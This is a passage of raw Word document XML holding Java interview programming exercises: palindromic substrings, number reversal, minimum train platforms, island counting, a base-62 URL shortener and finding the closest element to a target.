    <w:p w14:paraId="1614F925" w14:textId="7FA2F34E"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001FE1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62242DA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F96F7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icSubstring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D94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39CAC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56CF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BAAAAABBA"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D31C6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alindro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3AF4490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A21CD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lindromic substrings:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39E7C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E7EB96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B900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F0BCF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F70C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FE6831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094012C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14B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81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AC5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p>
    <w:p w14:paraId="021C1FD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lindro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DF7E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p>
    <w:p w14:paraId="291B7A3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2C43A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2CF4D1"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8B12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7128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3633696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06FA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A78F6A"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35AF3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08EFB4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84A1AF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F98FE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13969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6209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9CF7A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4ACE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09FB37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967BF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91DB96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6D159E" w14:textId="4ACA2E55"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4A4354" w14:textId="77777777" w:rsidR="00A83799" w:rsidRPr="00CE4B95" w:rsidRDefault="00A83799" w:rsidP="00A83799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA6AB87" w14:textId="23DBFFFB" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="371" w:name="_Toc197867585"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="003B0B7D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Reverse of given number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
    </w:p>
    <w:p w14:paraId="3E0F1E87" w14:textId="10191863" w:rsidR="00EA2925"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the reverse of a given number? Input - 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6512FBA1" w14:textId="685C06D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15CFC"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D92EFF"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CEBC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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E87A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647522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27BAB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331E28"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last digit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58189AE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digit to reversed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC715B"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last digit from number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995822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FFB8D"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205B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Numb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56B25835"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09B92" w14:textId="598B3B6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03A83A" w14:textId="77777777" w:rsidR="00772D0E" w:rsidRPr="00CE4B95" w:rsidRDefault="00772D0E" w:rsidP="00772D0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244C407B" w14:textId="70E17F59" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="372" w:name="_Toc197867586"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00F47ACE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Minimum number of platform required for train</w:t>
      </w:r>
      <w:bookmarkEnd w:id="372"/>
    </w:p>
    <w:p w14:paraId="54B85573" w14:textId="77777777" w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00FD3C4B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to return the minimum number of platforms required for a train?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3083A" w14:textId="274EE0E1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F5EAD" w14:textId="46F2A16E"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2:05 12:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0093D" w14:textId="4444AED8"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3:10 14:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F1C57" w14:textId="4ED459EB"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0 07:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0EEB67" w14:textId="2EBF5FF5"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5 05:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C52853A" w14:textId="31446D12" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD3C4B" w:rsidP="00FD3C4B">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2:15 02:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDD40B" w14:textId="344F81A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p>
    <w:p w14:paraId="49D41D5F" w14:textId="52F0708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697798C1" w14:textId="40421C9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p>
    <w:p w14:paraId="2C2C1CC0" w14:textId="434FF43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eparture</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357B629" w14:textId="6D59E67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latform</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T_MI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46F41684" w14:textId="2CEBF57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whi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length</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1094B5" w14:textId="7334CEF0"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938F" w14:textId="60F0801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5C9AAA71" w14:textId="056F8F3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489948E" w14:textId="7FD87B8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1D14EDD2"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i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F449C9" w14:textId="589EFF1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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF7C36" w14:textId="66ACE4A1"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0CF570"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oun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930B103"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j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C03AC6F" w14:textId="11CBD51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3FB1130" w14:textId="1F9ACAF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t xml:space="preserve">finalPlatfor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31CF49D0" w14:textId="50C7447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here update result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F6F33" w14:textId="674DFC5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A69F20A" w14:textId="0D2B310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p>
    <w:p w14:paraId="6D771C82" w14:textId="7401F1D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p>
    <w:p w14:paraId="0D8D8DE2" w14:textId="024C706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A88C4E3" w14:textId="498153F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644F6F62" w14:textId="2F4587BD" w:rsidR="00966D05" w:rsidRPr="00CE4B9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p>
    <w:p w14:paraId="56710114" w14:textId="087EBF3E"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amp;&amp;</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8434D7B" w14:textId="3FA7193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9005321" w14:textId="7331469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8204F5" w14:textId="5194888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23052165" w14:textId="4A6BBA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16DED2DF" w14:textId="6EEA31B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7D4C6ACF" w14:textId="00C109F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0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3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30</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535</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15</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA7112" w14:textId="08A86C4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5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4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7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5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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0B2B4" w14:textId="404F8D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5B948446" w14:textId="46F28B6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required a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p>
    <w:p w14:paraId="71BF50EB" w14:textId="0E48478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074C78E6" w14:textId="21D4FBA5" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="_Toc197867587"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00535BED" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Count number of island</w:t>
      </w:r>
      <w:r w:rsidR="001F7152" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a boolean 2D matrix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
    </w:p>
    <w:p w14:paraId="6213FEC8" w14:textId="77777777" w:rsidR="00C200DA" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00C200DA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a Java program to count islands in a boolean 2D matrix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34222F33" w14:textId="0CBF7B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E798AA0" w14:textId="64313B15"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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C7E076" w14:textId="5AFCD0C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0 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FADB86" w14:textId="7FB76D08"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0 0 0 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C4502F" w14:textId="113A950F"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1 0 0 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4145173B" w14:textId="1A61D3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1 0 1 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6CD4C" w14:textId="1ABA4670" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00C200DA" w:rsidP="00C200D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3 connected island</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEA9DD" w14:textId="601930A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Isla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2EC7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B629D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C713F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C7BD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17F6E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rections for 8 possible neighbors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67788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886609"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CBF0C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49FBE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cell is valid and safe to visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395124D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Saf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ED26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62DA76C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720BCDD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49E597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E308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D8754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pth-First Search to mark connected 1's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A191BD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CB25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39615F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AA28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all 8 neighbors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E04D5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045EE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07B951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6B88F00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Saf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6D0AD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1545D3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6A69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F2460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62DF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CE8DB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function to count islands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F5A4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83E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60DCB8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9604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C28863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25A0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349B2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3114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68EBD9C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3B0E5D0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11345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58AB4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AF4F8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8AE99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730809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17A1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6AE4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8004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E952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5ABF2D3"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08F48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3D71A9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E238BF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BD414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7ECD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C552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islands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p>
    <w:p w14:paraId="204C7A8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1B9598" w14:textId="30657622"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986557B" w14:textId="77777777" w:rsidR="00535BED" w:rsidRPr="00CE4B95" w:rsidRDefault="00535BED" w:rsidP="00535BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276E18A0" w14:textId="050DA2B9" w:rsidR="009A102A" w:rsidRPr="00CE4B95" w:rsidRDefault="009A102A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="374" w:name="_Toc197867588"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00C2785F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Shorten the given URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="374"/>
    </w:p>
    <w:p w14:paraId="2152E27A" w14:textId="77777777" w:rsidR="00092ED7" w:rsidRPr="00CE4B95" w:rsidRDefault="009A102A" w:rsidP="00092ED7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00092ED7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to shorten the given URL?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B36AD8" w14:textId="102A881C" w:rsidR="009A102A" w:rsidRPr="00CE4B95" w:rsidRDefault="00092ED7" w:rsidP="00092ED7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Input: https://docs.google.com/document/d/1g1CwT8dhCGgjh1LtXSaRBZ1ctREqkldD76lAU4KxPOo/edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16CD91" w14:textId="7D142F69" w:rsidR="009A102A" w:rsidRPr="00CE4B9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23D436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6350377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6C90A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rlShorten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F6D20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E5261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hort.url/"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F2693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HAR_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defghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB334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A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4AC06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7DCFA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keyToUrl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393B1F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rlToKe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41E9C5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612A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encode URL to short key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9BAF0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967F9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A0BB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C8F497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02FF2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249B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8D3ACB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0B95557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FBF15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p>
    <w:p w14:paraId="2E67A62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595CE09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208E7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0B0753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901D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37F2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decode key back to original URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486CE1C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1D57F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ASE_HO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4C3A68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RL not found"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D91537"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0F95F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F97E1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62 encoding (a-z, A-Z, 0-9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49675C9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58396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5C9F7D8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A0BFE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4AEFACE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67CA0B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23C88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70CFDA2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0C31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7A0B2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768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docs.google.com/document/d/1g1CwT8dhCGgjh1LtXSaRBZ1ctREqkldD76lAU4KxPOo/edit"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACE967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7059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B1C172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horten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p>
    <w:p w14:paraId="6FB0400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9450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Url</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD700F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pand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Url</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264CBE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1FE51" w14:textId="3533AE76"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D8CB80B" w14:textId="77777777" w:rsidR="007816A5" w:rsidRPr="00CE4B95" w:rsidRDefault="007816A5" w:rsidP="007816A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD6E457" w14:textId="6A7A93B0" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="_Toc197867589"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00041EC0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Find element closest to given target</w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
    </w:p>
    <w:p w14:paraId="5A04732E" w14:textId="77777777" w:rsidR="00A46C5A" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="00A46C5A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00A46C5A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a java program to find element closest to given target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C39715" w14:textId="2C6D318E"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 int arr[] = { 1, 2, 4, 5, 6, 6, 8, 9 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587E5A2" w14:textId="7412E5BB"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t target = 11;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02A66F" w14:textId="14042C46" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00A46C5A" w:rsidP="00A46C5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 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7EAF1" w14:textId="292B41B2"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osestElement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A6B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ABB3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2C5D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E3D933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4670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696D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D0887"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C2D14C9"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Diff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inDif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332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Diff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35E771"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4AFCACB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A0FE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1696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71F4CB96"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3246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08D82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58AA8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3A93DC6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557A6A6D"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51B4B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5D8F61AB"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osest element to targ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60A2C100"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F3F5F" w14:textId="38B2C67B"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69E42D8" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95" w:rsidRDefault="00041EC0" w:rsidP="00041EC0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED4C801" w14:textId="4BB2C111" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="376" w:name="_Toc197867590"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
